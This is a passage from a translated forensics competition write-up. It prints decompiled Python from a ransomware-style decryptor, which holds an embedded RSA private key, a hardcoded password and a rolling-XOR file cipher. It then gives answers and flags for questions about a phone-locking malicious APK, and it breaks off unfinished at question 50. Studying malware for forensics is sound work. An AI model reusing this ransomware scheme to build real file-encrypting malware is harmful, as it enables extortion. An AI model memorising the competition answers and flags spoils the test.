prikey = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAx5JF4elVDBaakgGeDSxICO1LyyZ6B2TgR4DNYiQoB1zAyWPD\nwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVobHVZh+rCI4MwAh+EBFUeT8Dzja4Z\nlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRnHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2\nfUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYziSOT4PCf/O12Kuu9ZklsIAihRPl10\nSmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhzRDFn9IQ6YQRjlLjuOX8WB6H4NbnK\nX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/IkwIEHoau+wKCAQAlhHEjPTFQ7suY\nU3Ji+L5TyeaFWYu3iDVmtzUTjUn2Yvr2+IyHKdU6z0vvGhsHYP8rUJcwWEBVaVbU\ndQZ8TXT0flBgC35NyGQnTHHbNsOWRvFpto0Gom5KuDS0DYPrm+Ic1Ev0SfLdY+iK\nV/uzjjeBF+CgEuvwO8xnYLsaFu6s0/ezQgEDBxpcN2KBBZoJ0eXxUUanEPkrLHA2\nDhRgUCKQks1kpJrGZp/DLb8dKfhWoQ1FV/bBsmv9lVj1Yk14oKdvb51QK53Mnhiz\nji49S+tazVCA+lP0M6lVSB2uLyB5JldT4kqOQvhtURSzW8oeTM9w1rLvW7qi823U\nWrJz+TQTAoGBAPIfUS9accG2fUA3AP93ZJU0SbZLc95JJXMyaRozFTTbxnMWB3sG\nqM9X1qZ4hECVvLF3Sn73B6kF3IaC8/Vpc2cyPHpM+ytdxZVm4uW75ZwYAvKEJeT3\n068CtcN6PvG3mFhvPsc3GK9FI1O63jrbSx+Y1hQlrVq6eMZUJh7V8BxXAoGBANMC\nmhN2sC85Pz450JNoG6Q3db0nm9kUs157TUBMGJCfvgh2Rj0t08FcEKQn+idtOf6Z\nZc2lRoLeaRq539Ex8zzsD7Dl7bFtePRsuDcAMuIFY2S0Z8jjj9BaCirrUluu1FWp\nTV60As9YBLnRosLTrYtgym+GNjdE/42uFRBJk9AlAoGBAIyGeStBbau1BmMSeTJt\n9QYjl95MJZXTbJD4IFV73nVG66I/yKp9Ry3Q1hHf/oDm6bepslI/7+lLK1TPRv7T\nO0PNY92vya15RUvFerOz2QvOz9SRh/ZU6rEwsy0qZtanGZ7pKCSsQIwcJcsTKdjO\nvMj9QIqxqmdpdh6zFDeGKu4/AoGAEzFuMCQH+liRp9MEZtEtoqtUSwbwhSUh4hl+\nnScp+a+sKIaF/ohJfXeBctWCF6iU/N5TH7SlnfBlZE7MBJHiiAz8EwWI4u4EmFkc\n7RvmfXowLO9L4pG2rzwcMGgrs9cJm+NcjlNmq+Kx4q+F4lHNN8+/7NPdmDyiUlAD\nATZCds8CgYEA2CFvsH+TUV3Q63UdTsdrUKK86vohjGSaoai7mEUGo4iZ/Ie+ScAa\nGtPFZUhO7EJqh2rNqAakfZGgKU43hAjiUHIjvZdAFNoqpNxO+bkEIPSFQQ6o34r3\naGTj9Pz1UH/ByW76V7defT/2jQsXHHFiVGpDU6WT80bInLqDQRxlDRk=\n-----END RSA PRIVATE KEY-----\n'

class XORCBC:

    def __init__(self, key: bytes):
        self.key = bytearray(key)
        self.cur = 0

    def decrypt(self, data: bytes) -> bytes:
        data = bytearray(data)
        for i in range(len(data)):
            data[i] ^= self.key[self.cur]
            self.key[self.cur] = data[i]
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(data)


def run_decrypt():
    print('解密程序 V1.0\n')
    present = input('请输入密码:')
    if present == '4008003721':
        for filepath, dirnames, filenames in os.walk(os.getcwd()):
            for filename in filenames:
                if '_encrypted' in filename:
                    print(os.path.join(filepath, filename) + '-解密成功')
                    data_file = os.path.join(filepath, filename)
                    data_handle = open(data_file, 'rb')
                    rsakey = RSA.import_key(prikey)
                    cipher = Cipher_pkcs1_v1_5.new(rsakey)
                    xor_key = cipher.decrypt(data_handle.read(256), '')
                    xor_obj = XORCBC(xor_key)
                    outname = data_file.replace('_encrypted', '')
                    outf = open(outname, 'wb')
                    buffer_size = 4096
                    while True:
                        data = data_handle.read(buffer_size)
                        if not data:
                            break
                        outf.write(xor_obj.decrypt(data))
                    outf.close()
        print('\n恭喜您,解密成功~~~~~~~~~~~~~~~')
        os.system('pause')
    else:
        print('\n密码错误~~~~~~~~~~~~~~~')
        run_decrypt()


run_decrypt()
# okay decompiling decrypt_file_1.pyc
Decompiling likewise yields the password 4008003721
Run it directly
TREFWGFS
46. The package name of the malicious APK is
Go find where the apk file is
Not sure whether it's my problem, but I couldn't export it; I downloaded it from the QR code link on the server side from earlier instead
Drop it into 雷电 (LDPlayer)
cn.forensix.changancup
47. The permissions used by the APK include
48. The FLAG2 value used to unlock level 1 is (FLAG is an 8-character string; if it must be entered in the apk, enter the full content, e.g. "FLAG9:QWERT123")
If you open it directly, your phone gets locked!
Open it in jadx-gui and search directly
FLAG2:MATSFRKG
49. The FLAG3 value used to unlock level 2 is (FLAG is an 8-character string; if it must be entered in the apk, enter the full content, e.g. "FLAG9:QWERT123")
Here is the code for level 2
I'll come back to the rest once things settle down; stopping here for now!
50. The KEY needed to unlock level 3 consists of printable ASCII characters; analyze and obtain the KEY value